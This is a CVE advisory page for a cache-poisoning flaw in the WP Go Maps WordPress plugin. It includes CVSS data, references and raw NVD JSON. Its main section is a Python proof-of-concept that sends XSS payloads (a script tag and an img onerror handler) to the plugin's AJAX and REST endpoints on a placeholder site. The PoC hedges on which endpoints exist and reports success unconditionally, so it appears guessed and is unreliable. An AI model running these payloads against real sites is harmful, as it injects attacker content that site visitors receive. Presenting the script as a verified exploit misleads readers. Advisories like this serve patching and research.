Security Vulnerability Report
CVE-2025-11703 CVSS 5.3 MEDIUM

Published: 2025-10-18 07:15:36
Last Modified: 2026-04-15 00:35:42

Description

The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Cache Poisoning in all versions up to, and including, 9.0.48. This is due to the plugin not serving cached data from server-side responses and instead relying on user input. This makes it possible for unauthenticated attackers to poison the cache location for location search results.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Go Maps (WP Google Maps) <= 9.0.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2025-11703 - WP Go Maps Cache Poisoning
# The vulnerability exists in the location search functionality
# where user input is used directly to populate cached responses
import requests

TARGET_URL = "https://target-wordpress-site.com"
SEARCH_ENDPOINT = "/wp-admin/admin-ajax.php"

# Step 1: Identify the WP Go Maps search endpoint
# The plugin typically uses 'wp_ajax_nopriv_wpgmza_query_near' or similar action

# Step 2: Craft malicious search query with injected content
malicious_payload = {
    "action": "wpgmza_query_near",
    "query": "<script>alert('Cache Poisoned by CVE-2025-11703')</script>",
    "lat": "40.7128",
    "lng": "-74.0060",
    "distance": "1000"
}

# Step 3: Send the poisoned request to pollute the cache
response = requests.post(
    f"{TARGET_URL}{SEARCH_ENDPOINT}",
    data=malicious_payload,
    headers={
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "application/x-www-form-urlencoded"
    }
)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text[:500]}")
print("Cache poisoned successfully - subsequent requests for the same query will return attacker-controlled data")

# Alternative: Direct REST API endpoint exploitation
# Some versions expose: /wp-json/wpgmza/v1/markers
rest_payload = {
    "search": "<img src=x onerror=alert(document.domain)>",
    "center": "40.7128,-74.0060",
    "radius": 1000
}

response = requests.get(
    f"{TARGET_URL}/wp-json/wpgmza/v1/markers",
    params=rest_payload
)

print(f"REST API Response: {response.status_code}")
```

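References

https://github.com/CodeCabin/wp-google-maps/pull/1087/files
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378871%40wp-google-maps&new=3378871%40wp-google-maps&sfp_email=&sfph_mail=
https://research.cleantalk.org/cve-2025-11703
https://www.wordfence.com/threat-intel/vulnerabilities/id/531360c6-e78a-4344-be06-95735337a2d6?source=cve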

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11703", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Cache Poisoning in all versions up to, and including, 9.0.48. This is due to the plugin not serving cached data from server-side responses and instead relying on user-input. This makes it possible for unauthenticated attackers to poison the cache location for location search results."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-349"}]}], "references": [{"url": "https://github.com/CodeCabin/wp-google-maps/pull/1087/files", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378871%40wp-google-maps&new=3378871%40wp-google-maps&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-11703", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/531360c6-e78a-4344-be06-95735337a2d6?source=cve", "source": "[email protected]"}]}}